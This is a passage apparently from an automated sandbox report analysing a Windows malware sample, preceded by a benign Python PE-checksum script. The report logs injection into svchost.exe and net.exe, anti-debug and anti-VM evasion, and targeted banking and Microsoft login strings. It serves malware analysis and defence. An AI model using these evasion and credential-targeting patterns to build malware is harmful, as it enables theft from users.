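                Two notes on the rows above. The checksum row reports a header CheckSum of 0xa2135 against a computed 0x152f43. That field is the imagehlp one's-complement sum over the whole file, filled in by the linker, so a non-zero value that no longer matches the bytes usually means the file was rewritten after linking (packed, patched or stub-appended); a value of 0 only means the linker never set it, which is common in unsigned third-party builds. The push/ret, push/retf and push/iretd rows are the control-flow-obfuscation heuristic: push imm32 followed by ret is a genuine disguised jump, but sequences such as push ss; retf or push ds; iretd are not meaningful user-mode code and, in the injected svchost.exe and net.exe regions, most likely come from disassembling packed data rather than from real instructions.

                The following Python is an added example, not part of the report, that recomputes the CheckSum field the same way pefile's generate_checksum does and turns the comparison into a verdict. The toy image it builds for its self-test is constructed here and is header-only, not a loadable PE; run the script on the original sample to reproduce the two values in the row.

```python
import struct
import sys


def pe_checksum(data: bytes) -> int:
    """Compute the PE image checksum as imagehlp's CheckSumMappedFile does:
    a 32-bit sum with end-around carry over the file as little-endian DWORDs,
    skipping the OptionalHeader.CheckSum field, folded to 16 bits, plus the
    file length."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ header)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file (missing PE signature)")
    # OptionalHeader follows the 4-byte signature and the 20-byte FILE_HEADER;
    # CheckSum is at OptionalHeader+0x40 in both PE32 and PE32+.
    checksum_off = e_lfanew + 4 + 20 + 0x40
    if checksum_off + 4 > len(data):
        raise ValueError("truncated optional header")
    if checksum_off % 4:
        raise ValueError("unaligned e_lfanew; refusing to guess")

    padded = data + b"\0" * (-len(data) % 4)   # pad the tail to a DWORD boundary
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue                            # the field itself is excluded
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:                  # fold the carry back in
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def stored_checksum(data: bytes) -> int:
    """Read the CheckSum value the header currently carries."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return struct.unpack_from("<I", data, e_lfanew + 24 + 0x40)[0]


def checksum_verdict(data: bytes) -> str:
    stored, real = stored_checksum(data), pe_checksum(data)
    if stored == 0:
        return "unset (linker never filled it in; common for unsigned builds)"
    if stored == real:
        return "ok"
    return f"mismatch: header says 0x{stored:x}, file computes to 0x{real:x} (modified after link?)"


def make_toy_image(stored: int, size: int = 256) -> bytes:
    """Constructed header-only image for the self-test (not a runnable PE):
    MZ stub, e_lfanew=0x40, PE signature, zeroed FILE/OPTIONAL headers and
    the given CheckSum value at OptionalHeader+0x40."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 24 + 0x40, stored)
    return bytes(buf)


if __name__ == "__main__":
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as fh:
            print(checksum_verdict(fh.read()))
    else:
        # Self-test on the constructed image: a stored value that matches
        # validates, and the field's own contents never change the result.
        print(checksum_verdict(make_toy_image(pe_checksum(make_toy_image(0)))))
```

                The toy image sums to 0x9FDD before the length is added, so its checksum is 0xA0DD for a 256-byte buffer regardless of what the CheckSum field itself holds; that invariance is the property the self-test relies on.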

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00444078 0_2_00444078
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe API/Special instruction interceptor: Address: 40E6CD4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\net.exe Window / User API: threadDelayed 3359
                Source: C:\Windows\SysWOW64\net.exe Window / User API: threadDelayed 6614
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe API coverage: 3.3 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exe API coverage: 2.7 %
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860 Thread sleep time: -85000s >= -30000s
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860 Thread sleep count: 38 > 30
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860 Thread sleep time: -57000s >= -30000s
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860 Thread sleep count: 48 > 30
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860 Thread sleep time: -48000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 7836 Thread sleep count: 3359 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 7836 Thread sleep time: -6718000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 7836 Thread sleep count: 6614 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 7836 Thread sleep time: -13228000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_0297C820 FindFirstFileW,FindNextFileW,FindClose, 4_2_0297C820
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
                Source: F14431U2a.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: discord.comVMware20,11696494690f
                Source: F14431U2a.4.dr Binary or memory string: AMC password management pageVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: F14431U2a.4.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: F14431U2a.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: F14431U2a.4.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: F14431U2a.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20U6&
                Source: F14431U2a.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: F14431U2a.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: F14431U2a.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868120665.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.1871753667.000002A8037DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: F14431U2a.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: F14431U2a.4.dr Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: F14431U2a.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494"
                Source: F14431U2a.4.dr Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: F14431U2a.4.dr Binary or memory string: global block list test formVMware20,11696494690
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696494690o
                Source: F14431U2a.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: F14431U2a.4.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: F14431U2a.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: teractivebrokers.co.inVMware20,1f69
                Source: F14431U2a.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: F14431U2a.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: F14431U2a.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\net.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417B93 LdrLoadDll, 2_2_00417B93
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0045A259 BlockInput, 0_2_0045A259
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_040E6F40 mov eax, dword ptr fs:[00000030h] 0_2_040E6F40
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_040E6FA0 mov eax, dword ptr fs:[00000030h] 0_2_040E6FA0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_040E5920 mov eax, dword ptr fs:[00000030h] 0_2_040E5920
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h] 2_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] 2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] 2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h] 2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h] 2_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h] 2_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h] 2_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h] 2_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h] 2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h] 2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h] 2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h] 2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h] 2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h] 2_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h] 2_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h] 2_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h] 2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h] 2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h] 2_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
